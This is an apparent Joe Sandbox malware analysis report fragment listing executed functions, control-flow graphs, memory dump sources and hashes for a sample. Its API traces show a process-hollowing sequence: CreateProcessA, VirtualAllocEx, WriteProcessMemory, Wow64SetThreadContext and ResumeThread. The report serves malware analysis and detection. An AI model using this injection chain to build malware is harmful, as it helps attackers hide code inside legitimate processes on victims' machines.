36535->36536 36616 755bc30 36536->36616 36620 755bc28 36536->36620 36624 755ba90 36539->36624 36628 755ba98 36539->36628 36540 755d5c7 36540->36539 36544 755d188 36543->36544 36544->36499 36545 755d7da 36544->36545 36632 755bd20 36544->36632 36636 755bd18 36544->36636 36545->36499 36549 755d3ef 36548->36549 36640 755b9e0 36549->36640 36644 755b9e8 36549->36644 36550 755d4b3 36550->36499 36554 755d49e 36553->36554 36556 755b9e0 ResumeThread 36554->36556 36557 755b9e8 ResumeThread 36554->36557 36555 755d4b3 36555->36499 36555->36555 36556->36555 36557->36555 36559 755d261 36558->36559 36561 755bc30 WriteProcessMemory 36559->36561 36562 755bc28 WriteProcessMemory 36559->36562 36560 755d697 36561->36560 36562->36560 36564 755d725 36563->36564 36566 755bc30 WriteProcessMemory 36564->36566 36567 755bc28 WriteProcessMemory 36564->36567 36565 755d8f1 36566->36565 36567->36565 36570 755d188 36568->36570 36569 755d7da 36569->36499 36570->36499 36570->36569 36571 755bd20 ReadProcessMemory 36570->36571 36572 755bd18 ReadProcessMemory 36570->36572 36571->36569 36572->36569 36574 755d122 36573->36574 36648 755beb0 36574->36648 36652 755beb8 36574->36652 36575 755d7da 36575->36499 36576 755d156 36576->36499 36576->36575 36579 755bd20 ReadProcessMemory 36576->36579 36580 755bd18 ReadProcessMemory 36576->36580 36579->36575 36580->36575 36656 755bb70 36581->36656 36660 755bb6b 36581->36660 36582 755d188 36582->36499 36583 755d7da 36582->36583 36586 755bd20 ReadProcessMemory 36582->36586 36587 755bd18 ReadProcessMemory 36582->36587 36583->36499 36586->36583 36587->36583 36589 755d476 36588->36589 36590 755d7da 36589->36590 36591 755bd20 ReadProcessMemory 36589->36591 36592 755bd18 ReadProcessMemory 36589->36592 36590->36499 36591->36590 36592->36590 36595 755d188 36593->36595 36594 755d7da 36594->36499 36595->36499 36595->36594 36596 755bd20 ReadProcessMemory 36595->36596 36597 755bd18 ReadProcessMemory 36595->36597 36596->36594 36597->36594 36600 755bd20 ReadProcessMemory 36598->36600 36601 755bd18 ReadProcessMemory 36598->36601 36599 755d7da 36599->36499 36600->36599 36601->36599 36603 755d188 36602->36603 36603->36499 36604 755d7da 36603->36604 36605 755bd20 ReadProcessMemory 36603->36605 36606 755bd18 ReadProcessMemory 36603->36606 36604->36499 36605->36604 36606->36604 36609 755ba90 Wow64SetThreadContext 36607->36609 36610 755ba98 Wow64SetThreadContext 36607->36610 36608 755d625 36609->36608 36610->36608 36613 755d188 36611->36613 36612 755d7da 36612->36499 36613->36499 36613->36612 36614 755bd20 ReadProcessMemory 36613->36614 36615 755bd18 ReadProcessMemory 36613->36615 36614->36612 36615->36612 36617 755bc35 WriteProcessMemory 36616->36617 36619 755bccf 36617->36619 36619->36536 36621 755bc2e WriteProcessMemory 36620->36621 36623 755bccf 36621->36623 36623->36536 36625 755ba98 Wow64SetThreadContext 36624->36625 36627 755bb25 36625->36627 36627->36540 36629 755ba9f Wow64SetThreadContext 36628->36629 36631 755bb25 36629->36631 36631->36540 36633 755bd27 ReadProcessMemory 36632->36633 36635 755bdaf 36633->36635 36635->36545 36637 755bd20 ReadProcessMemory 36636->36637 36639 755bdaf 36637->36639 36639->36545 36641 755ba28 ResumeThread 36640->36641 36643 755ba59 36641->36643 36643->36550 36645 755ba28 ResumeThread 36644->36645 36647 755ba59 36645->36647 36647->36550 36649 755bf41 CreateProcessA 36648->36649 36651 755c103 36649->36651 36651->36651 36653 755bf41 CreateProcessA 36652->36653 36655 755c103 36653->36655 36655->36655 36657 755bbb0 VirtualAllocEx 36656->36657 36659 755bbed 36657->36659 36659->36582 36661 755bb70 VirtualAllocEx 36660->36661 36663 755bbed 36661->36663 36663->36582

                                                Executed Functions

                                                Function 05337170 Relevance: 2.9, Strings: 1, Instructions: 1694COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 373 5337170-533719b 374 53371a2-533773a call 5336d70 * 2 call 5336d80 * 2 call 5336d90 * 2 call 5336da0 call 5336d90 * 2 call 5336d70 call 5336db0 call 5336d90 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 373->374 375 533719d 373->375 462 5337903-5337916 374->462 375->374 463 533773f-5337746 462->463 464 533791c-5338147 call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 call 5336e20 call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e10 call 5336e40 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e10 call 5336e40 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e50 462->464 465 5337781-5337792 463->465 587 5338149 464->587 588 533814e-533821e call 5336e60 464->588 466 5337794-53377c9 465->466 467 5337748-5337775 465->467 471 53377d0-53377f7 466->471 472 53377cb 466->472 469 5337777-533777c 467->469 470 533777d-533777e 467->470 469->470 470->465 474 53377f9 471->474 475 53377fe-5337842 471->475 472->471 474->475 477 5337844 475->477 478 5337849-533788a 475->478 477->478 481 5337891-53378b2 478->481 482 533788c 478->482 483 53378ec-53378fd 481->483 482->481 484 53378b4-53378e1 483->484 485 53378ff-5337900 483->485 487 53378e3-53378e7 484->487 488 53378e8-53378e9 484->488 485->462 487->488 488->483 587->588 596 5338229-5338db6 call 5336e10 call 5336e70 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e40 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e40 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336dd0 call 5336de0 call 5336df0 call 5336e80 call 5336e90 call 5336ea0 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e40 call 5336eb0 call 5336ec0 call 5336ed0 call 5336ee0 * 12 call 5336de0 call 5336ef0 call 5336f00 588->596
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Pp^q
                                                • API String ID: 0-3179448734
                                                • Opcode ID: 36272ad50058aa1ac75229fd656ada4c85e1c5181d254982e962d8d5c93ef60d
                                                • Instruction ID: c96db9256a02d638353a403179a4241f7f90e2996d34a605ef9e28513c742ae5
                                                • Opcode Fuzzy Hash: 36272ad50058aa1ac75229fd656ada4c85e1c5181d254982e962d8d5c93ef60d
                                                • Instruction Fuzzy Hash: 2D03D934A4121ACFCB54EF64C895AE9B7B2FF89304F1145E9E409AB361DB71AE85CF40
                                                Function 05337163 Relevance: 2.8, Strings: 1, Instructions: 1540COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 754 5337163-533719b 756 53371a2-53371c7 754->756 757 533719d 754->757 758 53371d1-53371dd call 5336d70 756->758 757->756 760 53371e2-53372d0 call 5336d70 call 5336d80 * 2 758->760 778 53372da-53372e6 call 5336d90 760->778 780 53372eb-5337334 call 5336d90 778->780 786 533733e-533734a call 5336da0 780->786 788 533734f-5337473 call 5336d90 * 2 call 5336d70 call 5336db0 call 5336d90 786->788 811 533747e-5337492 788->811 812 5337498-53374d6 call 5336dc0 811->812 815 53374db-53374e6 812->815 816 53374ec-533750e 815->816 817 5337519-533752d call 5336dd0 816->817 819 5337532-533773a call 5336de0 call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 817->819 844 5337903-5337916 819->844 845 533773f-5337746 844->845 846 533791c-53380fe call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 call 5336e20 call 5336df0 call 5336e00 call 5336e10 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e10 call 5336e40 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e10 call 5336e40 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e50 844->846 847 5337781-5337792 845->847 966 5338104-5338131 846->966 848 5337794-53377c9 847->848 849 5337748-5337775 847->849 853 53377d0-53377f7 848->853 854 53377cb 848->854 851 5337777-533777c 849->851 852 533777d-533777e 849->852 851->852 852->847 856 53377f9 853->856 857 53377fe-5337842 853->857 854->853 856->857 859 5337844 857->859 860 5337849-533788a 857->860 859->860 863 5337891-53378b2 860->863 864 533788c 860->864 865 53378ec-53378fd 863->865 864->863 866 53378b4-53378e1 865->866 867 53378ff-5337900 865->867 869 53378e3-53378e7 866->869 870 53378e8-53378e9 866->870 867->844 869->870 870->865 968 5338137-5338147 966->968 969 5338149 968->969 970 533814e-53381f5 call 5336e60 968->970 969->970 977 5338200-533821e 970->977 978 5338229-5338db6 call 5336e10 call 5336e70 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e40 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e40 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336dd0 call 5336de0 call 5336df0 call 5336e80 call 5336e90 call 5336ea0 call 5336dc0 call 5336dd0 call 5336de0 call 5336df0 call 5336e00 call 5336e30 call 5336e40 call 5336eb0 call 5336ec0 call 5336ed0 call 5336ee0 * 12 call 5336de0 call 5336ef0 call 5336f00 977->978
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Pp^q
                                                • API String ID: 0-3179448734
                                                • Opcode ID: 4df2a197a6dd2745f3cfdccaab7e9c558bc1ccc1f8abed45d9886f4a9bc38341
                                                • Instruction ID: 2ec4a058943c85bdd657f1f0a8137911f36f0cca64b00f6ebdf7396022453e60
                                                • Opcode Fuzzy Hash: 4df2a197a6dd2745f3cfdccaab7e9c558bc1ccc1f8abed45d9886f4a9bc38341
                                                • Instruction Fuzzy Hash: CCF2D734A4121ACFC754EF64C899AE9B7B1FF89304F1145E9E409AB361DB71AE85CF40
                                                Function 0755F238 Relevance: .6, Instructions: 612COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1173b6658c5dd55a5fe4b06ee4583f8b76ec896e88d85448792303caa33c4e81
                                                • Instruction ID: c77d5addc8cc76101e1bbe67761a16ff18f3bab1b98bd0b631bfcc05c2d79b11
                                                • Opcode Fuzzy Hash: 1173b6658c5dd55a5fe4b06ee4583f8b76ec896e88d85448792303caa33c4e81
                                                • Instruction Fuzzy Hash: D432AAB0B012159FDB19DB68C560BAE77F6BF89300F24446AE546DB3A1CF35E901CB91
                                                Function 0755BEB0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 316 755beb0-755bf4d 318 755bf86-755bfa6 316->318 319 755bf4f-755bf59 316->319 324 755bfdf-755c00e 318->324 325 755bfa8-755bfb2 318->325 319->318 320 755bf5b-755bf5d 319->320 321 755bf80-755bf83 320->321 322 755bf5f-755bf69 320->322 321->318 326 755bf6d-755bf7c 322->326 327 755bf6b 322->327 335 755c047-755c101 CreateProcessA 324->335 336 755c010-755c01a 324->336 325->324 328 755bfb4-755bfb6 325->328 326->326 329 755bf7e 326->329 327->326 330 755bfd9-755bfdc 328->330 331 755bfb8-755bfc2 328->331 329->321 330->324 333 755bfc4 331->333 334 755bfc6-755bfd5 331->334 333->334 334->334 337 755bfd7 334->337 347 755c103-755c109 335->347 348 755c10a-755c190 335->348 336->335 338 755c01c-755c01e 336->338 337->330 340 755c041-755c044 338->340 341 755c020-755c02a 338->341 340->335 342 755c02c 341->342 343 755c02e-755c03d 341->343 342->343 343->343 345 755c03f 343->345 345->340 347->348 358 755c1a0-755c1a4 348->358 359 755c192-755c196 348->359 361 755c1b4-755c1b8 358->361 362 755c1a6-755c1aa 358->362 359->358 360 755c198 359->360 360->358 364 755c1c8-755c1cc 361->364 365 755c1ba-755c1be 361->365 362->361 363 755c1ac 362->363 363->361 367 755c1de-755c1e5 364->367 368 755c1ce-755c1d4 364->368 365->364 366 755c1c0 365->366 366->364 369 755c1e7-755c1f6 367->369 370 755c1fc 367->370 368->367 369->370 372 755c1fd 370->372 372->372
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0755C0EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: c
                                                • API String ID: 963392458-112844655
                                                • Opcode ID: 0671d579779d120717e5d65a72e6d4b2f83ebcc2a805ca6d34b18d22b32b3458
                                                • Instruction ID: 09aba642442fde1c04d82d674f99f8a07c882d2710ed7d9e777d990922382e99
                                                • Opcode Fuzzy Hash: 0671d579779d120717e5d65a72e6d4b2f83ebcc2a805ca6d34b18d22b32b3458
                                                • Instruction Fuzzy Hash: 5F915FB1D0031ADFDB14CFA8C8517EDBBB2BF44314F1485AAE849A7290DB749985CF91
                                                Function 0755BEB8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1221 755beb8-755bf4d 1223 755bf86-755bfa6 1221->1223 1224 755bf4f-755bf59 1221->1224 1229 755bfdf-755c00e 1223->1229 1230 755bfa8-755bfb2 1223->1230 1224->1223 1225 755bf5b-755bf5d 1224->1225 1226 755bf80-755bf83 1225->1226 1227 755bf5f-755bf69 1225->1227 1226->1223 1231 755bf6d-755bf7c 1227->1231 1232 755bf6b 1227->1232 1240 755c047-755c101 CreateProcessA 1229->1240 1241 755c010-755c01a 1229->1241 1230->1229 1233 755bfb4-755bfb6 1230->1233 1231->1231 1234 755bf7e 1231->1234 1232->1231 1235 755bfd9-755bfdc 1233->1235 1236 755bfb8-755bfc2 1233->1236 1234->1226 1235->1229 1238 755bfc4 1236->1238 1239 755bfc6-755bfd5 1236->1239 1238->1239 1239->1239 1242 755bfd7 1239->1242 1252 755c103-755c109 1240->1252 1253 755c10a-755c190 1240->1253 1241->1240 1243 755c01c-755c01e 1241->1243 1242->1235 1245 755c041-755c044 1243->1245 1246 755c020-755c02a 1243->1246 1245->1240 1247 755c02c 1246->1247 1248 755c02e-755c03d 1246->1248 1247->1248 1248->1248 1250 755c03f 1248->1250 1250->1245 1252->1253 1263 755c1a0-755c1a4 1253->1263 1264 755c192-755c196 1253->1264 1266 755c1b4-755c1b8 1263->1266 1267 755c1a6-755c1aa 1263->1267 1264->1263 1265 755c198 1264->1265 1265->1263 1269 755c1c8-755c1cc 1266->1269 1270 755c1ba-755c1be 1266->1270 1267->1266 1268 755c1ac 1267->1268 1268->1266 1272 755c1de-755c1e5 1269->1272 1273 755c1ce-755c1d4 1269->1273 1270->1269 1271 755c1c0 1270->1271 1271->1269 1274 755c1e7-755c1f6 1272->1274 1275 755c1fc 1272->1275 1273->1272 1274->1275 1277 755c1fd 1275->1277 1277->1277
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0755C0EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c1e63afc4a9aa7af6f1c4ef32a8192d5393e074c592c3db74e8046a3d7b304d9
                                                • Instruction ID: 204c8df54cc6c11ffb0497398736a7143cf4721ff3d7650ebd566a374c3165d4
                                                • Opcode Fuzzy Hash: c1e63afc4a9aa7af6f1c4ef32a8192d5393e074c592c3db74e8046a3d7b304d9
                                                • Instruction Fuzzy Hash: 21914DB1D0031ADFDB14CFA8C8517DDBBB2BF44314F1485AAE849A7290DB749985CF92
                                                Function 0102ADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1278 102ada8-102adb7 1279 102ade3-102ade7 1278->1279 1280 102adb9-102adc6 call 102a0cc 1278->1280 1281 102adfb-102ae3c 1279->1281 1282 102ade9-102adf3 1279->1282 1287 102adc8 1280->1287 1288 102addc 1280->1288 1289 102ae49-102ae57 1281->1289 1290 102ae3e-102ae46 1281->1290 1282->1281 1334 102adce call 102b030 1287->1334 1335 102adce call 102b040 1287->1335 1288->1279 1291 102ae7b-102ae7d 1289->1291 1292 102ae59-102ae5e 1289->1292 1290->1289 1295 102ae80-102ae87 1291->1295 1296 102ae60-102ae67 call 102a0d8 1292->1296 1297 102ae69 1292->1297 1293 102add4-102add6 1293->1288 1294 102af18-102afd8 1293->1294 1329 102afe0-102b00b GetModuleHandleW 1294->1329 1330 102afda-102afdd 1294->1330 1299 102ae94-102ae9b 1295->1299 1300 102ae89-102ae91 1295->1300 1298 102ae6b-102ae79 1296->1298 1297->1298 1298->1295 1302 102aea8-102aeaa call 102a0e8 1299->1302 1303 102ae9d-102aea5 1299->1303 1300->1299 1307 102aeaf-102aeb1 1302->1307 1303->1302 1309 102aeb3-102aebb 1307->1309 1310 102aebe-102aec3 1307->1310 1309->1310 1311 102aee1-102aeee 1310->1311 1312 102aec5-102aecc 1310->1312 1318 102aef0-102af0e 1311->1318 1319 102af11-102af17 1311->1319 1312->1311 1314 102aece-102aede call 102a0f8 call 102a108 1312->1314 1314->1311 1318->1319 1331 102b014-102b028 1329->1331 1332 102b00d-102b013 1329->1332 1330->1329 1332->1331 1334->1293 1335->1293
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0102AFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 67162c1a15746e0e786ce57954936b48bbea1955ff39f5eb81dbf0db6e546e26
                                                • Instruction ID: bcea19da893badff08a6bda724a3387c6d531e7766b6b417d36f009fb9e854f8
                                                • Opcode Fuzzy Hash: 67162c1a15746e0e786ce57954936b48bbea1955ff39f5eb81dbf0db6e546e26
                                                • Instruction Fuzzy Hash: 0F714470A00B15CFDB64DF29D58079ABBF5BF88304F008A2DE48AD7A50DB75E949CB90
                                                Function 053318E4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1336 53318e4-5331956 1338 5331961-5331968 1336->1338 1339 5331958-533195e 1336->1339 1340 5331973-5331a12 CreateWindowExW 1338->1340 1341 533196a-5331970 1338->1341 1339->1338 1343 5331a14-5331a1a 1340->1343 1344 5331a1b-5331a53 1340->1344 1341->1340 1343->1344 1348 5331a60 1344->1348 1349 5331a55-5331a58 1344->1349 1350 5331a61 1348->1350 1349->1348 1350->1350
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05331A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: f0b550deaa929cf860934ab5625c41ecec85ac6428bd858acecfd0124deb0bef
                                                • Instruction ID: ab8aa91d03df02308de731d1f849590ce6ee8e7a3e6160ef21325d05959aedc8
                                                • Opcode Fuzzy Hash: f0b550deaa929cf860934ab5625c41ecec85ac6428bd858acecfd0124deb0bef
                                                • Instruction Fuzzy Hash: 2951C3B1D103199FDB14CFA9C885ADEBBB5FF88314F24812AE819AB210D7719985CF91
                                                Function 053318F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1351 53318f0-5331956 1352 5331961-5331968 1351->1352 1353 5331958-533195e 1351->1353 1354 5331973-5331a12 CreateWindowExW 1352->1354 1355 533196a-5331970 1352->1355 1353->1352 1357 5331a14-5331a1a 1354->1357 1358 5331a1b-5331a53 1354->1358 1355->1354 1357->1358 1362 5331a60 1358->1362 1363 5331a55-5331a58 1358->1363 1364 5331a61 1362->1364 1363->1362 1364->1364
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05331A02
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 0b96199b575a3f16a2d9c42ca168fd81d8937c66310968f4ad46e110a605e49e
                                                • Instruction ID: 0c152bcc2d050c94a7f42be578149c665b77a922010f208aa344b0a675e331bd
                                                • Opcode Fuzzy Hash: 0b96199b575a3f16a2d9c42ca168fd81d8937c66310968f4ad46e110a605e49e
                                                • Instruction Fuzzy Hash: 7241C0B1D003099FDB14CFA9C885ADEBBB5BF88310F24812AE819AB210D7709985CF91
                                                Function 010244B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1365 10244b4-10259d9 CreateActCtxA 1368 10259e2-1025a3c 1365->1368 1369 10259db-10259e1 1365->1369 1376 1025a4b-1025a4f 1368->1376 1377 1025a3e-1025a41 1368->1377 1369->1368 1378 1025a60 1376->1378 1379 1025a51-1025a5d 1376->1379 1377->1376 1381 1025a61 1378->1381 1379->1378 1381->1381
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 1235b4f6a6e84f12f289c3dd9dbf5bff9b1873c9f3fbc2c3e9fb6bdc0503d195
                                                • Instruction ID: c2722411ce57ae261f633c4f8491d6e7912012f174042098dfac827c6c5b46b5
                                                • Opcode Fuzzy Hash: 1235b4f6a6e84f12f289c3dd9dbf5bff9b1873c9f3fbc2c3e9fb6bdc0503d195
                                                • Instruction Fuzzy Hash: E641D2B0C00729CBDB24DFA9C8857DDBBF5BF49304F24809AD448AB255DB756946CF90
                                                Function 0102590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1382 102590c-10259d9 CreateActCtxA 1384 10259e2-1025a3c 1382->1384 1385 10259db-10259e1 1382->1385 1392 1025a4b-1025a4f 1384->1392 1393 1025a3e-1025a41 1384->1393 1385->1384 1394 1025a60 1392->1394 1395 1025a51-1025a5d 1392->1395 1393->1392 1397 1025a61 1394->1397 1395->1394 1397->1397
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ae1b829acfc17413680c5e62f16dafe658fb2d2fb4ac2191f40e599cd2ca5fc8
                                                • Instruction ID: 48f3d23638e3f4a3365312ba791ec4cdbde5f5d7c35db450e3bf423947cf703f
                                                • Opcode Fuzzy Hash: ae1b829acfc17413680c5e62f16dafe658fb2d2fb4ac2191f40e599cd2ca5fc8
                                                • Instruction Fuzzy Hash: F241D2B0C00729CEDB24CFA9C8857DDBBF5BF49304F2481AAD448AB255DB756946CF90
                                                Function 05334040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1398 5334040-533407c 1399 5334082-5334087 1398->1399 1400 533412c-533414c 1398->1400 1401 53340da-5334112 CallWindowProcW 1399->1401 1402 5334089-53340c0 1399->1402 1407 533414f-533415c 1400->1407 1404 5334114-533411a 1401->1404 1405 533411b-533412a 1401->1405 1409 53340c2-53340c8 1402->1409 1410 53340c9-53340d8 1402->1410 1404->1405 1405->1407 1409->1410 1410->1407
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05334101
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 1cdd90c76ed28cb5ecdc3af2be3a389f580c84302d59572c31d1a07ba870d912
                                                • Instruction ID: d4419166da842c0efc4592f94c1ae7e1c208f8a955a3e92c51153387c27a4176
                                                • Opcode Fuzzy Hash: 1cdd90c76ed28cb5ecdc3af2be3a389f580c84302d59572c31d1a07ba870d912
                                                • Instruction Fuzzy Hash: 1041E9B5A00609CFCB14CF99C449AAAFBF5FF88314F24C459E519AB361D775A841CFA0
                                                Function 0755BC28 Relevance: 1.6, APIs: 1, Instructions: 77injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1412 755bc28-755bc2c 1413 755bc35-755bc7e 1412->1413 1414 755bc2e-755bc34 1412->1414 1417 755bc80-755bc8c 1413->1417 1418 755bc8e-755bccd WriteProcessMemory 1413->1418 1414->1413 1417->1418 1420 755bcd6-755bd06 1418->1420 1421 755bccf-755bcd5 1418->1421 1421->1420
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0755BCC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 9c5b4756a7ff1a50062005fc401c6fe1fe42755f690d774b0a9147c4051b9f92
                                                • Instruction ID: 62a7d4ba60f59b29ee0adfe347b3e9e935eec865009983002417d6e2fed7c0bd
                                                • Opcode Fuzzy Hash: 9c5b4756a7ff1a50062005fc401c6fe1fe42755f690d774b0a9147c4051b9f92
                                                • Instruction Fuzzy Hash: 473147B190035A9FCB10CFA9C885BDEBFF5FF48310F10842AE958A7240D7789545CBA4
                                                Function 0755BD18 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0755BDA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 004aed8b32d729a59aa824c9316db4eb053c70043a8e8f69185fc19d40ba5de3
                                                • Instruction ID: ef9503a17add2de488d0f04409286ab9aa322659b53556e0cf6326ada7e72f5d
